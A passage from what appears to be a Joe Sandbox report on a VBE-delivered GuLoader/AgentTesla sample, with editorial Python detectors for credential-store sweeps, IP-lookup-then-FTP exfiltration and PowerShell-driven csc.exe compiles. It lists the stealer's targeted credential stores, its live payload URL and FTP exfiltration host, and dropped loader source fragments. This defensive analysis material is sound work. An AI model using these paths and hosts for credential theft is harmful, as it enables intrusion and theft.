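    {"image": CASPOL, "pid": 4212, "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"image": CASPOL, "pid": 4212, "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"image": CASPOL, "pid": 4212, "target": r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect"},
    {"image": CASPOL, "pid": 4212, "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"image": CASPOL, "pid": 4212, "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"image": CASPOL, "pid": 4212, "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": CASPOL, "pid": 4212, "target": r"C:\Windows\System32\kernel32.dll"},  # not a store: ignored
    # benign: each application reading only its own store
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "pid": 1120,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe", "pid": 3300,
     "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
]


def classify(target):
    """Return the application family whose credential store `target` is, or None."""
    t = target.lower().replace("/", "\\")
    for family, fragment in CREDENTIAL_STORES.items():
        if fragment.lower() in t:
            return family
    return None


def analyse(events):
    """Group store accesses per pid and return {pid: alert} for processes that either
    touch stores of two or more families (a harvester sweeps everything) or touch a
    store their image does not own. Non-store targets are ignored."""
    touched = defaultdict(lambda: {"image": None, "families": set()})
    for ev in events:
        family = classify(ev["target"])
        if family is None:
            continue
        touched[ev["pid"]]["image"] = ev["image"]
        touched[ev["pid"]]["families"].add(family)
    alerts = {}
    for pid, rec in touched.items():
        image_name = rec["image"].rsplit("\\", 1)[-1].lower()
        foreign = {f for f in rec["families"] if image_name not in OWNING_IMAGES.get(f, set())}
        if len(rec["families"]) >= 2 or foreign:
            alerts[pid] = {"image": rec["image"], "families": sorted(rec["families"]),
                           "foreign": sorted(foreign)}
    return alerts


if __name__ == "__main__":
    for pid, alert in analyse(SAMPLE_EVENTS).items():
        print(f"pid {pid} {alert['image']}: swept {len(alert['families'])} stores: "
              f"{', '.join(alert['families'])}")
```

The two-family rule is the robust half: a real mail client or browser opens its own store and nothing else, while a stealer opens every store it knows about within seconds, so the sweep itself is the signal and the allowlist only helps with single-store reads.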

          Remote Access Functionality

          barindex
Source: Yara match | File source: 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_010E4A7A bind,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe | Code function: 17_2_010E4A55 bind,
MITRE ATT&CK Matrix (techniques with hits; the numeric markers are the report's own hit counters, reproduced as printed):

Execution: Windows Management Instrumentation (211); Scripting (11); Command and Scripting Interpreter (21); PowerShell (1)
Persistence: DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Scripting (11); Obfuscated Files or Information (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (351); Access Token Manipulation (1); Process Injection (11)
Credential Access: OS Credential Dumping (2); Credentials in Registry (1)
Discovery: File and Directory Discovery (1); System Information Discovery (115); Security Software Discovery (421); Process Discovery (1); Virtualization/Sandbox Evasion (351); Application Window Discovery (1); System Network Configuration Discovery (1)
Collection: Archive Collected Data (1); Data from Local System (2); Email Collection (1)
Exfiltration: Exfiltration Over Alternative Protocol (1)
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (23)
Initial Access, Lateral Movement, Network Effects, Remote Service Effects, Impact: no techniques with hits

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID 755441; sample PO-08784 xlsx.vbe; start date 28/11/2022; architecture WINDOWS; score 100)

Sample: PO-08784 xlsx.vbe
  Domains/IPs: ftp.mcmprint.net; b3solutionscws.com; 2 other IPs or domains
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 5 other signatures
  started: wscript.exe
    Signatures: Wscript starts Powershell (via cmd or directly); Obfuscated command line found; Very long command line found
    started: powershell.exe
      dropped: C:\Users\user\AppData\...\3uneeqsg.cmdline (Unicode)
      Signatures: Tries to detect Any.run; Hides threads from debuggers
      started: CasPol.exe
        Network: ftp.mcmprint.net 185.31.121.136 (ports 21, 49807, 49808), RAX-ASBG, Bulgaria; b3solutionscws.com 192.185.145.188 (ports 49803, 80), UNIFIEDLAYER-AS-1US, United States; api.ipify.org.herokudns.com 54.91.59.199 (ports 443, 49805), AMAZON-AESUS, United States
        Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 5 other signatures
      started: csc.exe
        dropped: C:\Users\user\AppData\Local\...\3uneeqsg.dll (PE32)
        started: cvtres.exe
      started: conhost.exe
    started: cmd.exe
      started: conhost.exe
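The CasPol.exe node in the graph contacts, in source-port order, b3solutionscws.com:80 (where the report lists the .pfb download URL), api.ipify.org:443 (a public-IP lookup) and ftp.mcmprint.net:21 (two TCP connections to the FTP control port). That sequence, a "what is my IP" request immediately followed by cleartext FTP to an external host, is the network shape of the FTP exfiltration the report attributes to the AgentTesla payload. The following added example, editorial rather than anything from the report, is detection logic over flow records that pairs an IP-check lookup with a subsequent FTP connection from the same source host. The flow records, the 10.0.0.0/24 source hosts and the timestamps are constructed; the three external addresses, names and ports are those in the graph; checkip.dyndns.org in the IP-check list is an assumption not taken from this report.

```python
"""Pair a public-IP lookup with a following outbound FTP connection from the same host.
Added example, not Joe Sandbox output: flow records mimic Zeek conn.log fields plus a
resolved name; the external hosts come from the report, everything else is invented."""
import ipaddress
from collections import defaultdict

# Services whose only purpose is to tell the client its public IP. api.ipify.org is the
# one contacted in this report; checkip.dyndns.org is an added assumption.
IP_CHECK_DOMAINS = {"api.ipify.org", "checkip.dyndns.org"}
# Destination ports treated as cleartext exfiltration channels. Port 21 is what the
# report shows; the set is a parameter so other channels can be added.
DEFAULT_EXFIL_PORTS = frozenset({21})
WINDOW_SECONDS = 300  # how long after the IP lookup an exfil connection still counts

# Constructed flow records (ts = Unix seconds). The three external hosts are those in the
# behavior graph; the source hosts, timestamps and benign flows are invented.
SAMPLE_FLOWS = [
    {"ts": 1669655000.0, "orig_h": "10.0.0.5",  "resp_h": "192.185.145.188", "resp_p": 80,  "name": "b3solutionscws.com"},
    {"ts": 1669655007.0, "orig_h": "10.0.0.5",  "resp_h": "54.91.59.199",    "resp_p": 443, "name": "api.ipify.org"},
    {"ts": 1669655009.0, "orig_h": "10.0.0.5",  "resp_h": "185.31.121.136",  "resp_p": 21,  "name": "ftp.mcmprint.net"},
    {"ts": 1669655011.0, "orig_h": "10.0.0.5",  "resp_h": "185.31.121.136",  "resp_p": 21,  "name": "ftp.mcmprint.net"},
    # benign: a host that looks up its public IP and does nothing else
    {"ts": 1669655020.0, "orig_h": "10.0.0.9",  "resp_h": "54.91.59.199",    "resp_p": 443, "name": "api.ipify.org"},
    # benign: FTP to an internal server with no preceding IP lookup
    {"ts": 1669655030.0, "orig_h": "10.0.0.12", "resp_h": "10.0.0.50",       "resp_p": 21,  "name": "files.corp.example"},
]


def is_external(ip):
    """True for globally routable addresses; private, loopback and link-local count as internal."""
    return ipaddress.ip_address(ip).is_global


def find_exfil_sequences(flows, exfil_ports=DEFAULT_EXFIL_PORTS, window=WINDOW_SECONDS):
    """Return one alert per source host that contacted an IP-check service and then, within
    `window` seconds, opened a connection on an exfil port to an external host. Flows are
    processed in time order per host; each lookup can produce at most one alert."""
    by_host = defaultdict(list)
    for f in flows:
        by_host[f["orig_h"]].append(f)
    alerts = []
    for host, host_flows in by_host.items():
        last_lookup = None
        for f in sorted(host_flows, key=lambda x: x["ts"]):
            if f["name"] in IP_CHECK_DOMAINS:
                last_lookup = f  # remember the most recent IP lookup
                continue
            if (last_lookup is not None and f["resp_p"] in exfil_ports
                    and is_external(f["resp_h"]) and f["ts"] - last_lookup["ts"] <= window):
                alerts.append({"host": host, "ip_check": last_lookup["name"],
                               "exfil_dst": f["resp_h"], "exfil_name": f["name"],
                               "exfil_port": f["resp_p"], "delay_s": f["ts"] - last_lookup["ts"]})
                last_lookup = None  # later exfil flows need a fresh lookup to alert again
    return alerts


if __name__ == "__main__":
    for a in find_exfil_sequences(SAMPLE_FLOWS):
        print(f"{a['host']}: {a['ip_check']} lookup then {a['exfil_name']} "
              f"({a['exfil_dst']}:{a['exfil_port']}) after {a['delay_s']:.0f}s")
```

The ordering constraint is what keeps this quiet: plenty of legitimate software asks for its public IP, and plenty of hosts use FTP, but almost nothing does the former and then immediately the latter to an address outside the organisation.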

Source | Detection | Scanner | Label
PO-08784 xlsx.vbe | 2% | Virustotal |
PO-08784 xlsx.vbe | 2% | ReversingLabs |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
api.ipify.org.herokudns.com | 0% | Virustotal |
ftp.mcmprint.net | 10% | Virustotal |
Source | Detection | Scanner | Label
http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb | 0% | Avira URL Cloud | safe
http://oqyPj4HORVpk3nSGGk.net | 0% | Avira URL Cloud | safe
http://kmbImL.com | 0% | Avira URL Cloud | safe
http://pesterbdd.com/images/Pester.png | 100% | Avira URL Cloud | malware
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://oqyPj4HORVpk3nSGGk.netXy | 0% | Avira URL Cloud | safe
https://api.ipify.orgftp://ftp.mcmprint.netklogz | 0% | Avira URL Cloud | safe
https://contoso.com/ | 0% | Avira URL Cloud | safe
https://contoso.com/License | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | 0% | Avira URL Cloud | safe
https://contoso.com/Icon | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
api.ipify.org.herokudns.com | 54.91.59.199 | true | false | | unknown
ftp.mcmprint.net | 185.31.121.136 | true | true | | unknown
b3solutionscws.com | 192.185.145.188 | true | false | | unknown
api.ipify.org | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
http://b3solutionscws.com/wp-admin/includes/UtXRqIMUipDp192.pfb | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
http://kmbImL.com | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://127.0.0.1:HTTP/1.1 | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.org | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://oqyPj4HORVpk3nSGGk.net | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://oqyPj4HORVpk3nSGGk.netXy | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.ipify.orgftp://ftp.mcmprint.netklogz | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://DynDns.comDynDNSnamejidpasswordPsi/Psi | CasPol.exe, 00000011.00000002.5855400651.000000001D881000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000004.00000002.1725359530.000000000534A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1676415365.00000000042E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000004.00000002.1683228291.000000000443B000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
54.91.59.199 | api.ipify.org.herokudns.com | United States | 14618 | AMAZON-AESUS | false
192.185.145.188 | b3solutionscws.com | United States | 46606 | UNIFIEDLAYER-AS-1US | false
185.31.121.136 | ftp.mcmprint.net | Bulgaria | 199364 | RAX-ASBG | true
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 755441
Start date and time: 2022-11-28 18:09:14 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 17m 46s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PO-08784 xlsx.vbe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 22
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBE@13/10@3/3
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .vbe
• Sleeps longer than 100000000 ms are automatically reduced to 1000 ms
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, svchost.exe
• TCP packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.242.97.97, 40.125.122.151
• Excluded domains from analysis (whitelisted): client.wns.windows.com, wdcpalt.microsoft.com, fe3.delivery.mp.microsoft.com, fs.microsoft.com, slscr.update.microsoft.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• Report size getting too big, too many NtReadVirtualMemory calls found
                              No simulations
                              No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8003
Entropy (8bit): 4.841989710132343
Encrypted: false
SSDEEP: 192:Qxoe5GVsm5emddVFn3eGOVpN6K3bkkjo5dgkjDt4iWN3yBGHD9smqdcU6C5pOWik:7hVoGIpN6KQkj22kjh4iUxgrib4J
MD5: 677C4E3A07935751EA3B092A5E23232F
SHA1: 0BB391E66C6AE586907E9A8F1EE6CA114ACE02CD
SHA-256: D05D82E08469946C832D1493FA05D9E44926911DB96A89B76C2A32AC1CBC931F
SHA-512: 253BCC6033980157395016038E22D3A49B0FA40AEE18CC852065423BEF773BF000EAAEB0809D0B9C4E167883288B05BA168AF0A756D6B74852778EAAA30055C2
Malicious: false
Preview: PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (1075), with no line terminators
Category: dropped
Size (bytes): 1078
Entropy (8bit): 4.940853242499253
Encrypted: false
SSDEEP: 24:JVSRTQ1BI7kKMy6k1Ahr0n8rsvJmsIpLnH:JV6TIBAXyuM08rsvJmsCLnH
MD5: D697E139982C89FE5B0FD2410BE24D8A
SHA1: A4436350800275EAB95B8C9FFF79C1A5AA3D5783
SHA-256: 7665F657D3972656C1ACBD5C46C4E1886F2CB8B427C0996BC78A34DCCF00C459
SHA-512: 8E1E55545B9B893D28FDF82C9A5122F35531CB3AB35A5C9CBA05FC52227BCD4F69513C07EE8EA2DEB02BC9F059116103228A9F7A480BEADA2FD153F937E3A726
Malicious: false
Preview: .using System;using System.Runtime.InteropServices;public static class Methyl1 {[DllImport("kernel32")]public static extern int GetThreadTimes(int Progr82,int Fremad,int Tele,int Tredi,int Tim);[DllImport("user32")]public static extern int ClientToScreen(int Inkorp,int tekno);[DllImport("kernel32")]public static extern int ExpandEnvironmentStrings(int Rotte,int Bul,int Ento);[DllImport("user32")]public static extern int EnumChildWindows(int Lithed,int Diobo,int Alung);[DllImport("winmm.dll")]public static extern int joySetCapture(int Kodif,int Vej,int Empti,int Reacti);[DllImport("kernel32")]public static extern void GlobalMemoryStatus(int Anlgsi);[DllImport("kernel32")]public static extern int IsValidCodePage(int Gaum);[DllImport("kernel32")]public static extern int HeapReAlloc(int Hand,int Fals,int Hung,int Under);[DllImport("gdi32")]public static extern int CreateSolidBrush(int For);[DllImport("kernel32")]public static extern int VirtualAlloc(int v1,int v2,int v3,int v4);[DllImpor

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
Category: dropped
Size (bytes): 371
Entropy (8bit): 5.211213369657342
Encrypted: false
SSDEEP: 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CN23ftVbBH0zxs7+AEszICN23ftVbDH:p37Lvkmb6KmDaWZE7DPH
MD5: 4D7761BC538C78315CB0B7D49537A004
SHA1: 8F0E7A3303C282F2B1859F63EB37BFE801B35B7C
SHA-256: 8422ADE6961B4092DDA6D9EF5C6AC15F621CB0803D19AB8197A5DA777928FC18
SHA-512: DAB197A4D3289F2996403152E6D60658473BB3611F050851050381A26A77AB477B09C5AA99E2C4440ABA54EB015B16C758C5DA91A228B5BD12AFDD948955DC26
Malicious: true
Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 4096
Entropy (8bit): 3.052799017232693
Encrypted: false
SSDEEP: 24:etGShEoL4q2fP+8cX7uAwOCTO7Ax+ilZZXaIXedLo1TtkF/K4NmWI+ycuZhN/nam:6hXpwPNYcYLIZT+1F/K61ul/na3Goq
MD5: 140A93F45C268888BF601F03CA80BB29
SHA1: A52983EFA9A949F18AAECE009A03325E63C4430B
SHA-256: 14B4DF06BE100518F7749895EE293E3E5BDD8156DF81166CAB0B9600743B565E
SHA-512: 9D589B9F809D0F07530DA0B6F9EC1F4DBE55EF36F7E1CAFA33D949E70316245BC17EAEABCF7E564093F88A89BE00C4856A8D4F4F161C0C2654BCBBC202DB8C6F
Malicious: false
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...K..c...........!................N&... ...@....... ....................................@..................................&..K....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H.......P ..............................................................BSJB............v4.0.30319......l...|...#~......@...#Strings....(.......#US.0.......#GUID...@...p...#Blob...........G.........%3............................................................/.(...................................................... 6............ E............ T............ m............ ~. .......... ..(.......... ..-.......... .. .......... ..-.......... .. .......... ..2...................

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
Category: modified
Size (bytes): 866
Entropy (8bit): 5.303224718050824
Encrypted: false
SSDEEP: 24:Aqd3ka6KmD7E7DPOKax5DqBVKVrdFAMBJTH:Aika6PnE7qK2DcVKdBJj
MD5: 551FF17659DB1C1CA656A1F4C542C140
SHA1: 1E5F30CB2A4C2E238AB6903A0EAB87219D3EE125
SHA-256: 001FACBC1F52BE24790C07EB1AAFD087CBB9395871F486C1DDE62B22CF2C71D0
SHA-512: BA9EDEF5F25DF7066AC9CE71F7FC1910B5C02978708C72E9DCCDC82AC6C0E274D0CF5DA9B42E54D49593508FB5CC5F8FF856BEF7FB8E0BE1993EF259F41E38D0
Malicious: false
Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
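The csc.exe command line captured above is the compile step that produced the dropped 3uneeqsg.dll: the CodeDOM compiler that PowerShell's Add-Type uses writes a random-named directory under %LOCALAPPDATA%\Temp containing the generated .0.cs source and the .cmdline argument file, then invokes csc.exe with /t:library, a reference to System.Management.Automation.dll and an /out: path in that same directory. That combination, with powershell.exe as the parent, is what the "Dot net compiler compiles file from suspicious location" Sigma signature in this report keys on, and here the compiled DLL is the P/Invoke shim (VirtualAlloc, HeapReAlloc and friends in the dropped source) that the GuLoader stage needs to run its shellcode. The following added example (editorial, not from Joe Sandbox or the Sigma rule) scores process-creation events for that pattern; the records are constructed Sysmon Event ID 1-style dictionaries, with only the malicious command line taken verbatim from the report, and the benign MSBuild event is invented.

```python
"""Score csc.exe process-creation events for the PowerShell Add-Type compile pattern.
Added example, not Joe Sandbox or Sigma code. The malicious command line is the one in
the report; the benign event and the field layout (Sysmon Event ID 1 style) are assumed."""
import re

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
# CodeDOM (used by Add-Type) compiles %TEMP%\<random>\<random>.0.cs into <random>.dll in the
# same directory; the name in this report is 8 lower-case alphanumerics, which is assumed here.
ADD_TYPE_LAYOUT_RE = re.compile(r"\\Temp\\([a-z0-9]{8})\\\1\.(?:0\.cs|dll)$", re.IGNORECASE)
# csc "/switch:value" arguments, quoted or bare, and positional .cs sources.
SWITCH_RE = re.compile(r'/(out|r|t|target|reference):(?:"([^"]*)"|(\S+))', re.IGNORECASE)
SOURCE_RE = re.compile(r'"([^"]+\.cs)"|(\S+\.cs)\b')

MALICIOUS_EVENT = {  # command line copied from the report's 3uneeqsg.cmdline / compiler output
    "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
    "ParentImage": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
    "CommandLine": (r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output '
                    r'/R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
                    r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" '
                    r'/out:"C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.dll" /debug- /optimize+ '
                    r'/warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\3uneeqsg\3uneeqsg.0.cs"'),
}
BENIGN_EVENT = {  # invented: an ordinary build started by MSBuild
    "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
    "ParentImage": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
    "CommandLine": r"csc.exe /noconfig /t:library /out:C:\src\app\obj\Debug\app.dll C:\src\app\Program.cs",
}


def parse_csc_args(cmdline):
    """Extract the switches that matter: output path, target kind, referenced assemblies
    and the positional .cs sources."""
    args = {"references": [], "out": "", "target": ""}
    for m in SWITCH_RE.finditer(cmdline):
        name = m.group(1).lower()
        value = m.group(2) if m.group(2) is not None else m.group(3)
        if name in ("r", "reference"):
            args["references"].append(value)
        elif name in ("t", "target"):
            args["target"] = value.lower()
        else:
            args["out"] = value
    args["sources"] = [quoted or bare for quoted, bare in SOURCE_RE.findall(cmdline)]
    return args


def assess(event):
    """Score a process-creation record. Returns None for anything that is not csc.exe,
    else the indicators that matched and whether they cross the alert threshold."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image != "csc.exe":
        return None
    args = parse_csc_args(event["CommandLine"])
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    indicators = {
        "parent_is_script_host": parent in SCRIPT_HOSTS,
        "output_in_temp": bool(TEMP_DIR_RE.search(args["out"])),
        "add_type_layout": bool(ADD_TYPE_LAYOUT_RE.search(args["out"]))
                           and any(ADD_TYPE_LAYOUT_RE.search(s) for s in args["sources"]),
        "references_automation_dll": any(r.lower().endswith("system.management.automation.dll")
                                         for r in args["references"]),
        "library_target": args["target"] == "library",
    }
    score = sum(indicators.values())
    # Three or more indicators: a library compiled from Temp by a script host, or with the
    # Add-Type layout plus the Automation reference, is not a developer build.
    return {"out": args["out"], "indicators": indicators, "score": score, "alert": score >= 3}


if __name__ == "__main__":
    for ev in (MALICIOUS_EVENT, BENIGN_EVENT):
        r = assess(ev)
        print(f"{'ALERT' if r['alert'] else 'ok   '} score={r['score']} out={r['out']}")
```

The parser deliberately reads the switches rather than grepping for "Temp" in the whole command line: the Sigma rule's location check is about where the output lands, and tying the .0.cs input and the .dll output to the same random directory is what separates Add-Type from any other csc invocation that happens to mention a temp path.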

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type: MSVC .res
Category: dropped
Size (bytes): 652
Entropy (8bit): 3.087847912769416
Encrypted: false
SSDEEP: 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryqgIYak7YnqqxgINPN5Dlq5J:+RI+ycuZhN/nakSGwPNnqX
MD5: 34955465138EB2BC53DC0D26D39005E8
SHA1: 200065A3FB120DB014BB5FBB910EAAF74060C879
SHA-256: CD95882F97D1A9AFF3A338D8AC93C25ABFB81237A4A0B316B3556908B9A58822
SHA-512: 732124C01B2B5F3716020DAE3BFB814B9F0575AEDA82BED745AD9A18F57A9676846974938B35DB07A9EB6B8826A1D91E70AEEFEFCAE608B66D0F27CFD8F6B8FF
Malicious: false
